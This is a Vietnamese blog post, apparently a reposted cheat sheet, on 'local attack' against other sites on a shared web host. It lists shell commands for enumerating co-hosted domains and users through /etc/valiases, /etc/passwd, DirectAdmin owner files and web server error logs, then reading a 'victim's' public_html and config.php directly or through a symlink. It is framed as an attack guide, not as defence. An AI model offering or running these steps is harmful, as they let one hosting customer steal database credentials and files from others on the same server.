Advertisement

Main Ad

Một số lệnh thông dụng trong local attack



 1. Xem tên domain trên cùng 1 host
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia

- Trường hợp đặc biết khi không thể xem user nằm cùng host thì thêm && vào
cd /etc/vdomainaliases && ls -lia
2. Xem tên user
cat /etc/passwd
less /etc/passwd
more /etc/passwd
tail /etc/passwd
rev /etc/passwd
tac /etc/passwd

- Ngoài ra ta có thể dùng lệnh sau để xem user

+ Với cpanel
 ls -la /etc/valiases/domain.com
Thay domain.com bằng tên miền của site bạn muốn xem user
ví dụ: 
ls -la /etc/valiases/quylevhb.com

+ Với Directadmin
 cat /etc/virtual/domainowners
 Còn rất nhiều cách để tìm user của victim như xem error log …
tail -n 10000 /var/log/httpd/domains/domain.com.error.log
cat /usr/local/apache/logs/error_log | grep “domain.com” >>”user.txt”
* Đối với nginx
cat /var/log/nginx/error_log
Hoặc
cat /var/log/nginx/domain.com.error.log


3. Local sang victim
dir /path
 Path: là đường dẫn đến thư mục cần xem 
ví dụ:
dir /home/quylevhb/public_html

4. Xem nội dung file
cat /path/tên-file.php
ví dụ:
cat /home/quylevhb/public_html/config.php

5. Symlink
ln -s /path/tên-file quylevhb.txt
ví dụ:
ln -s /home/quylevhb/public_html/config.php quylevhb.txt

6. Một số lệnh khác
- mkdir:  Tạo thư mục
- touch: tạo file
- cp: copy file
- mv: di chuyển file hoặc thư mục
- rm: Xóa file
- rmdir: xóa thư mục


Nguồn: http://quylevhb.blogspot.com/2015/02/mot-so-lenh-thong-dung-trong-local.html#ixzz49tw8DfWv

Đăng nhận xét

0 Nhận xét